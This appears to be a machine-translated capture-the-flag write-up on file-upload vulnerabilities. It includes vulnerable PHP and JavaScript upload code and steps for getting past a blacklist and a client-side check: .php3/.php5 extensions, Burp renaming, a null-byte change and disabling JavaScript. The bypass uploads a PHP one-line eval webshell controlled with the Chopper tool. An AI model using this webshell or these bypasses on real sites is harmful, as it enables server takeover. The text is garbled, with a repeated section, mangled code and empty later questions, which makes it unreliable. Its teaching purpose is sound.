1.5 Webshell File Upload Vulnerability Analysis Traceability (1~4)

Webshell file Upload Vulnerability Analysis traceability (first question)

Let's take a look at the Basics page:

Upload 1.php----> Well, no surprise.

Upload 1.png---->

We view page elements----->, and no front end verification

It seems that we can only use burp to grab packets to bypass, we modify 1.php----> 1.php. png, and then upload the grab bag to change the package 0x20-----> 0x00

Webshell file Upload Vulnerability Analysis traceability (first question)

Let's take a look at the Basics page:

Upload 1.php----> Well, no surprise.

Upload 1.png---->

We view page elements----->, and no front end verification

It seems that we can only use burp to grab packets to bypass, we modify 1.php----> 1.php. png, and then upload the grab bag to change the package 0x20-----> 0x00

Look at someone else's WP, found to be the blacklist bypass, that is, upload the simplest 1.php3 or 1.PHP4 or 1.PHP5, the server to filter the PHP ... Negligence.

Chopper Link:, OK, hit the face ....

Come here, let's take a look at the source code:

index.php

<!doctype html>class= "Site-wrapper" > <formclass= "Form-signin" action= "upload.php" method= "post" enctype= "Multipart/form-data" name= "upload" > class= "Form-control" type= "file" name= "Upfile"/> <input type= "Submit" name= "submit" value= "Upload file"/> </form>& Lt;/div></body>
upload.php
<?PHP//File Upload Vulnerability Demo script service-side extension validationHeader("content-type:text/html; Charset=utf-8 "); error_reporting(0);Header("content-type:text/html; Charset=utf-8 "); error_reporting(0);$uploaddir= ' uploads/';if(isset($_post[' Submit '])) {    if(file_exists($uploaddir)) {        $deny _ext=Array('. asp ', '. php ', '. aspx ', '. JSP '); //Echo strrchr ($_files[' upfile ' [' Name '], '. ');        $file _ext=STRRCHR($_files[' Upfile '] [' name '], '. '); //echo $file _ext;        if(!In_array($file _ext,$deny _ext)) {            if(Move_uploaded_file($_files[' Upfile '] [' Tmp_name '],$uploaddir. ‘/‘ .$_files[' Upfile '] [' Name '])) {                Echo' File upload successfully saved in: '.$uploaddir.$_files[' Upfile '] [' Name ']. "\ n"; }        } Else {            Echo' This file is not allowed to be uploaded '. "\ n"; }    } Else {        Exit($uploaddir. ' folder does not exist, please create it manually '); }    //Print_r ($_files);}?>
It uses the blacklist filter PHP is filtered out, but PHP there are other versions, PHP3,PHP4,PHP5 can be the parser
Webshell file Upload Vulnerability Analysis Traceability (second question)
This time we upload 1.php3:
Upload 1.png:
We put 1.php---> 1.php. jpg,
We look at the page source code:
<!doctype html>Extarray=New Array(". gif", ". jpg", ". png");functionLimitattach (Form,file) {Allowsubmit=false;if(!file)return; while(file. indexOf ("\ \")! =-1)file=file. Slice (file. indexOf ("\ \") + 1); Ext=file. Slice (file. IndexOf (".")).toLowerCase (); for(vari = 0; i < extarray.length; i++) {if(Extarray[i] = = EXT) {Allowsubmit =true; Break; }}if(allowsubmit) Form.submit ();ElseAlert ("Sorry, you can only upload files in the following format:" + (Extarray.Join("  ")) + "\ n Please re-select the eligible file" + "Upload again.");return false;}</script>class= "Site-wrapper" > <formclass= "Form-signin" action= "upload.php" method= "post" enctype= "Multipart/form-data" name= "upload" > class= "Form-control" type= "file" name= "UploadFile"/> <input type= "Submit" name= "submit" value= "Upload file" onclick= "return Limitattach (This.form, This.form.uploadfile.value) "/> </form></div></body>
Found in the front end of the existence of JS authentication, can only recognize the image format of the file upload, there are two ways:
The first is: a word trojan 1.php suffix to the. jpg format and then upload, with Burpsuit to the file format to 1.php, after the successful upload with a chopper to link to get the shell, and find key.
The second is: first in the browser input about:config (Firefox browser only), and then search Java Script. Enabled will switch to false, so that JavaScript is disabled, front-end verification does not work, create a sentence Trojan < PHP eval ($_post[' 123 ')), direct upload, return to upload path uploads/1.php, then chopper link
Webshell file Upload Vulnerability Analysis Traceability (third question)
Webshell file Upload Vulnerability Analysis Traceability (question fourth)
1.5 Webshell File Upload Vulnerability Analysis Traceability (1~4)